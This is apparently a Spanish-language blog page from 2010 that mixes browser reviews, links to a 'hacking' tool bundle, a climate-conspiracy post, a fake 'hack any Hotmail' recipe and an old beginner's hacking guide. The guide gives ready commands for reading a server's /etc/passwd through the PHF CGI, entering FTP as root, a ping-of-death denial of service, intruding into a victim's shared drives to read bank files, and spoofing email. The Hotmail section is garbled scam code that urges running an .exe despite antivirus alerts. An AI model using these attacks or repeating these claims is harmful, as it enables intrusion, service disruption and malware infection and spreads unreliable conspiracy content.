http://depositfiles.com/files/6reefian0
Hoy en día raro será que no conozcas Firefox, el navegador que impide a Bill Gates dormir por las noches, y es que no para de ganar y ganar terreno frente al omnipresente Internet Explorer.
Parece que fue ayer cuando disfrutábamos por primera vez de Firefox, y ya tenemos una mejora frente a la tercera entrega. En esta versión se ha intentado potenciar algunos de los puntos flojos del programa. Aparece, por fin, un modo de navegación privada, un limpiador selectivo de historial y un menú de últimas ventanas cerradas.
Firefox mejora también la seguridad en diversos frentes (phising, malware, virus...), se simplifica más aún el uso, pero incluyendo también nuevas características y una configuración más completa.
Pero no olvidemos otro importantísimo apartado que ha sido mejorado: el rendimiento. La nueva versión es visiblemente más rápida, por ejemplo alternando entre pestañas abiertas, y a su vez hace uso de menos memoria en comparación con Firefox 2.x y 3. Además, es más compatible que nunca con los estándares web.
Cambios recientes en Firefox:
* Actualización de seguridad
Pros
Modo de navegación privada que no deja huellas
Miles de extensiones disponibles
Gestor de descargas muy práctico
Alertas en páginas peligrosas
Contras
Algunas de las extensiones no son compatibles
En los últimos meses, navegadores como Opera o Firefox empezaban a comerle terreno al tradicional Internet Explorer. Ante esta situación Microsoft no se ha quedado ni mucho menos de brazos cruzados, y buena prueba de ello es esta nueva versión de su famoso navegador web.
Internet Explorer 7 destaca a primera vista por una interfaz totalmente remodelada, con un diseño más simple y más limpio que otorga un mayor espacio de pantalla a las páginas web que visites.
Quizás la mayor sorpresa sea la presencia (por fin) de pestañas, que permiten una navegación mucho más cómoda. Podrás visualizar todas las que tengas abiertas de un solo vistazo mediante pequeñas capturas y reunir varias de ellas en un grupo para luego guardarlo como un único Favorito.
Otras funciones interesantes son el soporte integrado para canales RSS, la ostensible mejora del sistema de impresión y las nuevas posibilidades en seguridad: control de ventanas emergentes, un filtro para evitar fraudes tipo "phishing", análisis de la configuración de privacidad de cada web que visites y un examen exhaustivo de los certificados de seguridad.
En definitiva, un Internet Explorer totalmente renovado que aunque parecía haberse quedado atrás, era sólo para coger impulso. El debate está servido.
Opera es conocido como el navegador más rápido y más pequeño con funciones completas, una primera elección para las personas mayores utilizando PCs y Windows 95 y una brillante alternativa a la IE por defecto de Microsoft. Opera, en primer lugar, es cliente de World Wide Web, que es el programa para la extracción de información de la WWW como los documentos creados con la ayuda HyperText Markup Language (lenguaje de marcado de hipertexto HTML). Los niveles de exigencia a los recursos del sistema. Opera funcionará incluso en 386 computadoras aproximadamente 6 MB de memoria operativa. La interfaz MDI. Usted puede abrir sin gastos especiales de la memoria cualquier cantidad de ventanas dentro de una ventana de trabajo, habiendo elegido, pues, una tabulared o modo de cascada.
Safari, el popular navegador web de Mac OS X, ya está disponible en Windows, con nuevo diseño y una velocidad de navegación increíble.
Safari incluye una nueva página de inicio, que se abre con cada nueva pestaña y que muestra miniaturas de las direcciones más visitadas.
El segundo puente fuerte de Safari es un navegación privada, ideal para visitar páginas sin que quede constancia en el historial ni en la lista de cookies y descargas.
Safari también tiene en cuenta también los favoritos. Además, puede ser un excelente lector RSS, bloquea ventanas emergentes, guarda nuestras contraseñas y datos de formulario e incluye una herramienta para acceder al código de la página visitada.
Cambios recientes en Safari:
* Mejoras de estabilidad en páginas que utilizan tag de vídeo para HTML 5
* Mejoras de estabilidad para plug-ins de terceros
* Estabilidad mejorada para Top Sites
* Correcciones
Requisitos mínimos:
* Procesador: 500 MHz
* Memoria: 256 MB
* Vídeo: 64 MB
* DirectX 9.0
Pros
Muy rápido
Diseño elegante y útil
Página principal con enlaces más vistos
Acceso al código de una web
Contras
No incluye extensiones
Google Chrome es el navegador web desarrollado por Google. Un navegador pensado para mejorar tu experiencia mientras navegas por Internet. Una excelente alternativa al Internet Explorer, Mozilla Firefox u Opera.
En Google Chrome se premia la eficiencia y el minimalismo. Su entorno únicamente muestra los controles básicos para navegar por Internet. Pero bajo ese entorno simplista, se esconden tres características muy interesantes: un innovador sistema de pestañas, una barra de direcciones con buscador integrado y una ventana resumen para facilitarte el acceso a tus páginas favoritas.
Sin duda, una de las características que hacen de Google Chrome un navegador diferente al resto es su sistema de pestañas. Al igual que en Internet Explorer o en Mozilla Firefox puedes abrir diferentes pestañas para visitar diferentes páginas en una misma ventana. La novedad es que estas pestañas son procesos totalmente independientes. Si una página genera errores o se cuelga, es posible cerrarla sin que afecte al resto de las pestañas abiertas.
Referente a la barra de direcciones, Google Chrome da un paso más que Mozilla integrando un buscador. Google Chrome agiliza la entrada de las direcciones mostrándote las páginas más vistas, diferentes términos de consulta, páginas en tus favoritas u otras páginas visitadas anteriormente. Todo en un tiempo récord.
Otra de las novedades que Google Chrome incluye es una ventana resumen. En ella se muestran imágenes en miniatura de tus páginas más visitadas, tus marcadores recientes, un historial con las últimas búsquedas y otros elementos que te ayudarán a agilizar el acceso al círculo de páginas por el que te sueles mover.
En definitiva, Google Chrome es el navegador web de Google. Un navegador que incluye una serie de novedades que, sin duda, no te dejarán indiferente.
TODOS ESTOS NAVEGADORES EN ESTE AIO
http://depositfiles.com/files/6reefian0
sábado, 3 de julio de 2010
"Ultra-Hacker" AIO
DESCRIPCION:
Este programa incluye muchos programas con los cuales puedes h.a.c.k.e.a.r casi cualquier cosa, pero la idea es no darle un uso indebido, sino para aprender y cosas así....alguno de ustedes debe conocer alguno de estos programas y si no busquen tutoriales y verán que aprenderan.
http://freakshare.net/files/4g3psycn/Ultra-Hacker_AIO_by_jesaes100.rar.html
Este programa incluye muchos programas con los cuales puedes h.a.c.k.e.a.r casi cualquier cosa, pero la idea es no darle un uso indebido, sino para aprender y cosas así....alguno de ustedes debe conocer alguno de estos programas y si no busquen tutoriales y verán que aprenderan.
http://freakshare.net/files/4g3psycn/Ultra-Hacker_AIO_by_jesaes100.rar.html
viernes, 25 de junio de 2010
PARCHE ACTUALIZADO C.S.S
ULTIMO PARCHE PARA COUNTER SOURCE AUN NO PROBADO
DESCARGALO HACIENDLICK AQUI
DESCARGALO HACIENDLICK AQUI
SE APROXIMA UNA TERRIBLE CRITICA A VARIAS DEVILIDADES DE CIBERES HACI QUE ATENTOS AL PROGRESO
ATENTOS HACKERS DE LAS ROSAS
jueves, 25 de marzo de 2010
miércoles, 24 de marzo de 2010
hacker descubre fraude de cambio climatico
Un hacker introducido en los archivos de la IPCC, organismo de la ONU dedicado al estudio del cambio climático, da a luz el mayor escándalo científico que se recuerda.
Los creadores del dogma del calentamiento global han sido puestos en entredicho. Sus correos electrónicos revelan un complot, con manipulación de temperaturas y de la aplicación del método, supresión de datos inconvenientes, el boicot a los disidentes, presiones a los escépticos…. Un ejemplo: Michael Mann explica cómo destruir una revista que ha publicado documentos científicos sobre el clima contrarios al calentamiento; en otro correo, promete contactar con la BBC para averiguar por qué permitió una opinión vagamente escéptica.
Otro se queja de que un artículo cuestionando la teoría del calentamiento obstaculizará su esfuerzo para sacarle dinero a Siemens. ¿En manos de quién estamos? En las de aquellos que quieren operar en el mundo como sus dueños dictando las normas de convivencia y poniendo tasa a la reproducción humana. Porque, recordemos: según estas teorías el mayor problema es el hombre y sólo reduciendo la población mundial podremos salvar el planeta. Otro engaño de la élite del Nuevo Orden Mundial coordinada desde los medios de comunicación en su poder.
Los creadores del dogma del calentamiento global han sido puestos en entredicho. Sus correos electrónicos revelan un complot, con manipulación de temperaturas y de la aplicación del método, supresión de datos inconvenientes, el boicot a los disidentes, presiones a los escépticos…. Un ejemplo: Michael Mann explica cómo destruir una revista que ha publicado documentos científicos sobre el clima contrarios al calentamiento; en otro correo, promete contactar con la BBC para averiguar por qué permitió una opinión vagamente escéptica.
Otro se queja de que un artículo cuestionando la teoría del calentamiento obstaculizará su esfuerzo para sacarle dinero a Siemens. ¿En manos de quién estamos? En las de aquellos que quieren operar en el mundo como sus dueños dictando las normas de convivencia y poniendo tasa a la reproducción humana. Porque, recordemos: según estas teorías el mayor problema es el hombre y sólo reduciendo la población mundial podremos salvar el planeta. Otro engaño de la élite del Nuevo Orden Mundial coordinada desde los medios de comunicación en su poder.
el verdadero manual para hackear mail
Metodo uno: Mandar un e-mail a passport_corfirm@hotmail.com para q confirme la accion como admin y te genere un cookie para poder entrar en el hotmail de la persona
-----------------------------------------------------------
En asunto escribe:
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count')
if(count == null) {
SetCookie('count','1')
return 1
}
else {
var newcount = parseInt(count) + 1;
DeleteCookie('count')
SetCookie('EL MAIL DE TU VICTIMA)
return count
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function checkCount(TU EMAIL) {
var count = GetCookie('count');
if (count == null) {
count=(TU PASSWORD)
SetCookie('count', count, exp);
En 24 horas el mensaje sera respondido por el boot.
2 metodo...
----------------------------------------------------------------
Link
http://files.filefront.com//;7650172;;/
Este archivo genera los codigos javascrip solo solo hace falta ejecutar el .exe
Algunos antivirus lo detectan como virus si pasa eso no te preocupes es normal q salte debido a q se trata a una herramienta de haching
-----------------------------------------------------------
En asunto escribe:
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count')
if(count == null) {
SetCookie('count','1')
return 1
}
else {
var newcount = parseInt(count) + 1;
DeleteCookie('count')
SetCookie('EL MAIL DE TU VICTIMA)
return count
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function checkCount(TU EMAIL) {
var count = GetCookie('count');
if (count == null) {
count=(TU PASSWORD)
SetCookie('count', count, exp);
En 24 horas el mensaje sera respondido por el boot.
2 metodo...
----------------------------------------------------------------
Link
http://files.filefront.com//;7650172;;/
Este archivo genera los codigos javascrip solo solo hace falta ejecutar el .exe
Algunos antivirus lo detectan como virus si pasa eso no te preocupes es normal q salte debido a q se trata a una herramienta de haching
manual hackear para novatos
Hackers y Hacking Os presento algunas cosillas que me las van a agradecer....
Nota Del Autor: No me hago responsable de la mala utilizacion de la informacion aqui expuesta ya que tan solo es para fines didacticos.
Esta guia es de distribucion libre excepto para las instituciones gubernamentales que deberan abonar 2000 pts a alguna fundacion para apadrinar niños.
INDICE:
1 ......................... Que Es Esta Guia Exactamente ?
2 ......................... Descripcion General De Windows.
2a ....................... Seguridad En Windows.
3 ......................... Protocolo TCP/IP y Demas Historias.
3a ....................... Puertos.
3b ....................... Ftp.
3c ....................... Telnet.
4 ......................... Hacking Basico En Windows.
4a ....................... Phf.
4b ....................... Ftp.
4c ....................... Ping De La Muerte.
4d ....................... Recursos Compartidos.
4e ....................... Fake Mail Con El Telnet.
4f ....................... Cambiando El Entorno.
4g ....................... Finger.
4h ....................... Whois.
4i ....................... Tracert.
5 ......................... Utilizacion De Tools.
5a ....................... SkamWerks Lab version 1.1b.
5b ....................... WaReZ! Version 95.12.31.
5c ....................... John the Ripper v1.4.
5d ....................... Gobbler v 2.1.
5e ....................... Modificando el WS_FTP.
5f ....................... Sharepasswd.
5g ....................... Snadboy's Revelation v1.1.
5h ....................... Keylog95.
5i ....................... Glide.
5j ....................... Win95 AnonyMail v 1.0.
5k ....................... Hacker's Utility, V 1.02.
5l ....................... Haktek v1.1.
5m ....................... Claymore Brute Force.
6 ......................... Medidas De Seguridad.
6a ....................... Protegiendo Nuestro Ordenador.
6a1 ..................... Ataques Tipicos a Nuestro Windows.
6a2 ..................... Encriptacion De Nuestra Informacion.
6a3 ..................... Eliminar Informacion De Forma Segura.
6a4 ..................... Eliminacion De Virus.
6b ....................... Protegiendo Nuestras Acciones.
6b1 ..................... Borrando Nuestras Huellas.
6b2 ..................... Encriptando Nuestro Correo.
7 ......................... Sugerencias Para Un Mejor Hacking.
8 ......................... Obtener Informacion.
9 ......................... Despedida.
9a ....................... Agradecimientos.
1. Que Es Esta Guia Exactamente ?
Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no quiere aprender unix o no lo sabe manejar (grave error). Pues por esta razon esta guia esta enfocada a los usuarios de windows, principalmente los de win95. Por el contrario esta guia no se dedicara al NT o Unix, aunque por supuesto se hara referencia a estos sistemas sobre todo cuando son estos mismos Sistemas Operativos en los cuales se centraran nuestros actos, supuestamente legales :)
Todo esto que digo puede sonar tonterias y puedes p0ensar que en win95 no podras llegar a ser un gran hacker porque es necesario conocer unix, y estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para hacer sus pinitos a aquellos que solo saber usar win95, yo por mi parte aconsejo aprender unix por varias razones que no viene a cuento en esta guia.
Con esta guia te convertiras en un magnifico Hacker usando un sistema que no es propenso al hacking. Como es normal al usar win95 estaremos muy limitados en muchos aspectos pero podras aprender por ejemplo, algunos bug que podras usar en tu favor, la utilizacion de diversas herramientas hacker que no estan disponibles generalemente en win95 y ademas a usar los recursos que te ofrece Internet en tu favor, abreviando un poco tanta charla, llegaras a conocer la red de una forma diferente y a manejar win95 de forma distinta a lo conocido hasta ahora.
2. Descripcion General De Windows.
Como todos sabemos el windows95 es un popular sistema operativo de la casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y ejecuta otro programa :) y veras esa famosa Multitarea.
El win95 es un sistema operativo de 32 bits multitarea, que es muy comodo para la gente que busca facilidad, pero no te enga¤es pensando que es un sistema ideal para Internet, puede que para un usuario convencional le sea estupendo pero para un Hacker se queda muy corto de calle, ya que le falta muchos servicios que otros sistemas operativos si traen como el que ya tantas veces he repetido, el Unix (se nota que me encanta??:).
Aqui os dejo de dar la murga sobre win95 ya que este texto no esta destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no creo que este contando nada nuevo sobre windows o sea que mejor me callo y si no sabes mucho sobre win95, pues ya sabes comprate un libro.
2a. Seguridad En Windows.
Como todos sabemos la seguridad en win95 es nula, es decir, win95 no tiene seguridad por si mismo, un claro ejemplo de esto que es las entanas que nos piden un password las podemos cerrar pulsando sobre la X o tambien nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana sin meter ningun password.
Por eso para que nuestro ventanas (nombre que se le da a win95:) tendremos que instalarle algun paquete de seguridad disponible por la red, que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre puedes comprar algun paquete comercial de seguridad, en mi opinion alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y cuando llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada seguro 100%.
Proteger nuestro win95 es cosa de cada uno pero tranquilidad, que la cosa no es muy dificil, es cuestion de estar atento a las novedades, en otras palabras estar informado. Mas abajo ya te entereras de estas cosas.
3. Protocolo TCP/IP y Demas Historias.
El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que engloba casi todos los servicios que solemos usar como por ejemplo cuando hacemos telnet, mail, ftp o cualquier cosa.
TCP/IP proviene de Transmission Control Protocol y Internet Protocol respectivamente. Por fortuna para los usuarios de win95, este protocolo ya viene incorporado nativamente en el sistema, al contrario que ocurria con el windows 3.x, el cual lo teniamos que instalar para poder conectar a Internet.
Como has podido comprobar en realidad son 2 protocolos pero que estan unidos, el primero o sea el TCP es el encargado de las comunicaciones y de la transmision de los paquetes cuando estamos conectados a un servidor. El IP es el encargado de que los paquetes llegen a destino por orden aunque tomen caminos diferentes.
* Diagrama del TCP *
cliente -> El cliente le envia una -> servidor
solicitud de conexion
espeficicando el puerto
de conexion al servidor.
cliente <- El servidor le responde <- servidor que conoce su peticion de conexion. cliente -> El cliente le devuelve <- servidor otra vez la peticion y el circuito ya esta abierto. * Diagrama del IP * ³Informacion general³Direccion IP³Direccion IP³Datos³ ³de cabezera. ³de origen ³de destino. ³ ³ Pues aqui se acaba la explicacion basica de este protocolo, para el que este interesado en profundizar le remito a que se pille el RFC 1180 o un fichero disponible en multitud de servidores, desgraciadamente no te puede asegurar el nombre del fichero ya que lo he encontrado de varias formas pero te dare el nombre que aparece al editarlo, ya que en todos es igual: Introduction to the Internet Protocols C R C S Computer Science Facilities Group C I L S RUTGERS The State University of New Jersey 3 July 1987 3a. Puertos Antes ya os he explicado muy brevemente la comunicacion del protocolo en cuestion. Pues ahora os pongo una extensa lista sobre los distintos puertos y sus servicios correspondientes. echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote qotd 17/udp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/tcp nameserver name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp nameserver # name-domain server domain 53/udp nameserver nameserver 53/tcp domain # name-domain server nameserver 53/udp domain mtp 57/tcp # deprecated bootp 67/udp # boot program server tftp 69/udp rje 77/tcp netrjs finger 79/tcp link 87/tcp ttylink supdup 95/tcp hostnames 101/tcp hostname # usually from sri-nic iso-tsap 102/tcp dictionary 103/tcp webster x400 103/tcp # ISO Mail x400-snd 104/tcp csnet-ns 105/tcp pop 109/tcp postoffice pop2 109/tcp # Post Office pop3 110/tcp postoffice portmap 111/tcp portmap 111/udp sunrpc 111/tcp sunrpc 111/udp auth 113/tcp authentication sftp 115/tcp path 117/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/udp ntpd ntp # network time protocol (exp) nbname 137/udp nbdatagram 138/udp nbsession 139/tcp NeWS 144/tcp news sgmp 153/udp sgmp tcprepo 158/tcp repository # PCMAIL snmp 161/udp snmp snmp-trap 162/udp snmp print-srv 170/tcp # network PostScript vmnet 175/tcp load 315/udp vmnet0 400/tcp sytek 500/udp biff 512/udp comsat exec 512/tcp login 513/tcp who 513/udp whod shell 514/tcp cmd # no passwords used syslog 514/udp printer 515/tcp spooler # line printer spooler talk 517/udp ntalk 518/udp efs 520/tcp # for LucasFilm route 520/udp router routed timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat rvd-control 531/udp MIT disk netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # uucp daemon klogin 543/tcp # Kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental garcon 600/tcp maitrd 601/tcp busboy 602/tcp acctmaster 700/udp acctslave 701/udp acct 702/udp acctlogin 703/udp acctprinter 704/udp elcsd 704/udp # errlog acctinfo 705/udp acctslave2 706/udp acctdisk 707/udp kerberos 750/tcp kdc # Kerberos authentication--tcp kerberos 750/udp kdc # Kerberos authentication--udp kerberos_master 751/tcp # Kerberos authentication kerberos_master 751/udp # Kerberos authentication passwd_server 752/udp # Kerberos passwd server userreg_server 753/udp # Kerberos userreg server krb_prop 754/tcp # Kerberos slave propagation erlogin 888/tcp # Login and environment passing kpop 1109/tcp # Pop with Kerberos phone 1167/udp ingreslock 1524/tcp maze 1666/udp nfs 2049/udp # sun nfs knetd 2053/tcp # Kerberos de-multiplexor eklogin 2105/tcp # Kerberos encrypted rlogin rmt 5555/tcp rmtd mtb 5556/tcp mtbd # mtb backup man 9535/tcp # remote man server w 9536/tcp mantst 9537/tcp # remote man server, testing bnews 10000/tcp rscs0 10000/udp queue 10001/tcp rscs1 10001/udp poker 10002/tcp rscs2 10002/udp gateway 10003/tcp rscs3 10003/udp remp 10004/tcp rscs4 10004/udp rscs5 10005/udp rscs6 10006/udp rscs7 10007/udp rscs8 10008/udp rscs9 10009/udp rscsa 10010/udp rscsb 10011/udp qmaster 10012/tcp qmaster 10012/udp La verdad es que no te quejaras :) de esta lista. Si quieres mas informacion sobre los puertos con su debida explicacion mirate el RFC 1060. 3b. Ftp. Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol o sea Protocolo de Transferencia de Ficheros y como podras observar en el listado de los puertos al FTP le corresponde el 21. Este servicio hay que conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking. Sino dispones de ningun cliente FTP, el propio win95 lleva incorporado uno, el unico problema es que no es muy vistoso ya que funciona en modo MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y se pondra en modo FTP. Un ejemplo seria esto: c:>ftp <- Escribimos FTP. ftp> <- activado el modo FTP. Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los comandos disponibles del FTP, como no viene a cuento no los explicare pero buscando por hay podras hallar informacion de lo que hace cada cosa pero lo mejor es que lo averigues tu solito. 3c. Telnet. Por suerte los usuarios de win95 con el telnet tienen mas suerte o menos segun se mire, ya que el servico de Telnet de win95 que tambien esta incorporado en el sistema, es muy facil de manejar y ademas tiene ventana propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aquí la de "sistema remoto", entonces se activara otra ventana en la que nos saldra tres opciones, la primera "nombre de host" es donde queremos conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo tenemos "tipo de terminal" que no hace falta cambiarlo. El telnet es importante ya que es asi como entramos a una cuenta en un servidor y podremos hacer lo que tengamos permitido en el sistema. Logicamente entraremos en una cuenta si tenemos el login y password. 4. Hacking Basico En Windows. Por fin ya se a acabo el latazo de la explicacion de como moverse por win95. Ahora ya podemos empezar a jugar un poco por inet :), siempre por puro placer pero jamas con malos fines. En esta seccion os explicare varias maneras de hacking usando el win95 a pelo o sea sin utilizar ninguna herramienta externa. 4a. Phf. La primera tecnica ya es muy conocida y la verdad es que tendremos suerte si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay que saber buscar y tener paciencia. Para que esto nos funcione solo tenemos que tener un navegador instalado en nuesto win95, por defecto suele venir el IE o sea que no podras decir que no tienes, siempre y cuando hallas instalado los paquetes extras. Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que corra sobre unix (muchos). Conectamos con un servidor en cuestion, www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le añadimos: http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Como ya he dicho si todo sale bien nos aparecera el fichero de passwords del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto el PHF tiene muchas variantes por eso te aconsejo que busce algo que profundice en esta tecnica al igual que tambien busce informacion sobre el fichero passwd de unix para comprenderlo. 4b. Ftp. Antes ya te he explicado el funcionamiento del FTP de win95, ahora lo usaremos para sacer el fichero de password de un servidor. Desde una ventana del MS-DOS llamamos al programa FTP y escribimos: ftp> open victima.com
Conect to victima.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> dir (o lo que querramos)
Y como siempre es el caso si todo sale bien estaremos metidos en el sistema como root (en lenguaje unix significa el superusuario, o sea el que controla el servidor). Por desgracia esta tecnica es muy antigua por lo que mas seguro no funcionara pero todo es posible.
4c. Ping De La Muerte.
Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo os quiero decir que aunque aqui os lo explicare no es cuestion que lo useis por Internet atacando servidores.
La utilidad Ping sirve principalmente para saber si un servidor esta activo y ademas podemos calcular el trafico en la red segun el tiempo de su respuesta. Basicamente se le envia un paquete a un servidor y este nos contesta, solo que si se le envia un paquete muy grande puede llegar desordenado, por lo que el servidor pide al origen que le vuelva a enviar una parte o la totalidad del paquete, por lo que se produce un datagrama del ping muy grande y producira su caida. Para ejecutar este ataque solo tenemos que escribir:
c:>ping -l 65510 victima.com
Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes de hacer tonterias leed la parte sobre seguridad de la guia.
4d. Recursos Compartidos.
Como win95 NO tiene seguridad nos permite colarnos en el disco duro de otra persona por Internet y lo mejor del caso es que esta tecnica nos la proporciona los propios programas del win95. Por supuesto no todo es tan sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala configuracion del propio usuario al no configurar adecuadamente los recursos compartidos de su red corriendo sobre win95.
Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador bien configurado, o sea el compartir recursos bien puesto y tambien tener el Netbios instalado. Para configurarlo, tenemos que tener activado la opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
SI por el caso la opcion esta desactivada simplemente pulsamos el boton de "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion" en "Cliente para redes Microsoft". Tambien tiene que estar activado el "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso Telefonico a Redes->Conexion a Inet que usaremos->boton derecho-> propiedades, debiendo estar activada la casilla "conectarse a la red".
Ahora ya podemos ponernos manos a la obra, entonces volvemos a una ventana del MS-DOS y ejecutamos:
c:>nbtstat -A (IP DE LA VICTIMA)
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
VICTIMAMACHINE <00> UNIQUE Registered
VICTIMAGROUP <00> GROUP Registered
VICTIMAMACHINE <03> UNIQUE Registered
VICTIMAMACHINE <20> UNIQUE Registered
VICTIMAGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Cuando ejecutamos este comando nos saldra una tabla como esta y el primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes ver la maquina se llama VICTIMAMACHINE.
Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
c:>edit c:windowssystem32LMHOSTS
VICTIMAMACHINE
Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos un comando para añadir el ordenador de la victima a nuestro Netbios y esto seria de la siguiente forma:
c:>NBTSTAT -R
Ahora nos interesa saber que recursos comparte la victima y esto tampoco nos traera complicacion alguna:
c:>net view VICTIMAMACHINE
Shared resources at VICTIMAMACHINE
Sharename Type Comment
-----------------------------------------
BANCO Disk
Y como podemos observar comparte una carpeta llamada BANCO.
Ahora ya podemos operar como si fuese una terminal mas en nuestra red local sobre win95. Ya solo nos queda ejecutar el comando que querramos, si por ejemplo queremos ver el contenido, solo tenemos que escribir:
c:> dir VICTIMAMACHINEBANCO
O para leer cualquier fichero de la carpeta:
c:> type VICTIMAMACHINEBANCOCUENTABANCARIA.TXT
Si queremos conectar al recurso compartido de forma grafica (o sea con una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos llamar, deberemos ejecutar:
c:>NET USE e: MIPCWINDOWS
Esta tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11 y ademas comparte las carpetas sin contrase¤a en modo "Acceso a nivel compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina para que este autorizada, esto lo conseguiremos con el Regedit, por desgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web Personal de Microsoft desactivan esta posibilidad de acceso remoto tras informar de la conveniencia de hacerlo al usuario, ya que el servidor web obliga a compartir carpetas aun sin tener red local.
Logicamente un usuario que haya tenido el despiste de conectarse a Internet con carpetas compartidas no toma luego medidas de control sobre quien entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser pillados si por ejemplo un usuario ejecuta el programa Netwatch, que muestra los usuarios conectados a nuestra computadora en cada momento y por supuesto el nombre de las computadoras por lo que es aconsejable cambiar el nombre de nuestra computadora usando el Regedit. Si nuestra maquina se llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con el Regedit a un nombre menos sospechoso.
Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se dara cuenta de nuestra entrada. Tambien hay que decir que si la VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo "hay otros usuarios conectados a su ordenador, si apaga se desconectaran" si ocurre esto seremos pillados.
4e. Fake Mail Con El Telnet.
Esta tecnica nos ayuda a suplantar la direccion de correo electronica que querramos :). La verdad es que tiene pocos usos, en mi opinion debido a una serie de razones pero siempre puede servir para gastar una buena broma enviando aun amigo un mail del director de la Universidad diciendo que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la Guardia Civil.
La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar unas ciertas medidas de seguridad, que ya explicare luego. Lo primero que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos a que nos conectemos a ese puerto, cuando conectemos nos saldra un mensaje y esta esperando a que pulsemoa alguna tecla:
220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
Muchas veces lo que podemos hacer es escribir "help" y saldran todos los comandos, tambien podemos escribir "echo" y la maquina nos contestara que esta lista. Para escribir un mail hay que seguir una serie de pasos:
